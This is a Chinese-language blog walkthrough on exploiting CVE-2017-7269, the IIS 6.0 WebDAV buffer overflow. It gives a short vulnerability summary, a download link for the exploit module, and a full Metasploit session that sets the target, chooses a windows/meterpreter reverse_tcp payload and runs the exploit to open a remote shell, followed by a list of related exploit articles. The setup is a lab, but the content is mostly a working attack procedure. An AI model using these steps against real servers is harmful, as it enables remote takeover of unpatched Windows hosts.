IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)
2018-01-24 12:57
579 查看
漏洞简介
漏洞编号:CVE-2017-7269发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)
漏洞简述:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。
漏洞类型:缓冲区溢出
漏洞等级:高危
影响产品:Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0(目前已验证,其他版本尚未验证)
触发函数:ScStoragePathFromUrl函数
附加信息:ScStoragePathFromUrl函数被调用了两次
漏洞细节:在Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞
实验环境
kali 192.168.1.160 win2003 192.168.197下载exp
链接: https://pan.baidu.com/s/1eTkOLEU 密码: i6ry导入模块
将CVE-2017-7269.rb导入到msf中cd /usr/share/metasploit-framework/modules/exploits/windows/iis
开始攻击
使用msf进行攻击msfconsole #打开msf msf > search CVE-2017-7269 [!] Module database cache not built yet, using slow search Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/iis/cve-2017-7269 2017-03-31 good CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow msf > use exploit/windows/iis/cve-2017-7269 msf exploit(cve-2017-7269) > show options #查看参数 Module options (exploit/windows/iis/cve-2017-7269): Name Current Setting Required Description ---- --------------- -------- ----------- HttpHost localhost yes http host for target PhysicalPathLength 19 yes length of physical path for target(include backslash) RHOST yes The target address RPORT 80 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Microsoft Windows Server 2003 R2 msf exploit(cve-2017-7269) > set RHOST 192.168.1.197 #设置目标ip RHOST => 192.168.1.197 msf exploit(cve-2017-7269) > set HttpHost 192.168.1.197 #设置目标网站 HttpHost => 192.168.1.197 msf exploit(cve-2017-7269) > set LHOST 192.168.1.160 #设置本地ip LHOST => 192.168.1.160 msf exploit(cve-2017-7269) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(cve-2017-7269) > exploit #若成功则获取meterpreter权限
相关文章推荐
- 学着分析CVE-2017-7269 -- IIS 6.0 WebDAV远程代码执行漏洞
- IIS 6.0 WebDAV远程代码执行(CVE-2017-7269) 含POC与修复方法
- IIS 6.0远程代码执行漏洞(CVE-2017-7269)
- 针对IIS6.0 WebDAV漏洞(cve-2017-7269)制作纯字符数字的shellcode回连msf
- CVE-2017-7269 IIS6.0利用MSF远程溢出漏洞提权
- Office 远程代码执行漏洞(CVE-2017-11882)复现过程
- Goahead 利用 CVE-2017-17562
- 9 月 19 日,腾讯云安全中心监测到 Apache Tomcat 修复了2个严重级别的漏洞, 分别为: 信息泄露漏洞(CVE-2017-12616)、远程代码执行漏洞(CVE-2017-12615
- 【漏洞公告】CVE-2017-8543:Windows Search远程代码执行漏洞
- Apache Solr远程代码执行漏洞(CVE-2017-12629)
- vmware漏洞之三——Vmware虚拟机逃逸漏洞(CVE-2017-4901)Exploit代码分析与利用
- OFFICE OLE2LINK(CVE-2017-0199)漏洞利用详解
- 【漏洞复现】Tomcat CVE-2017-12615 远程代码执行漏洞
- Tomcat 远程代码执行漏洞分析(CVE-2017-12615)
- Spring Data REST PATCH请求远程代码执行漏洞(CVE-2017-8046) 本地复现方法
- 利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
- MS15-034 IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC
- 利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
- CVE-2017-7269远程代码执行漏洞利用流程备录
- 利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果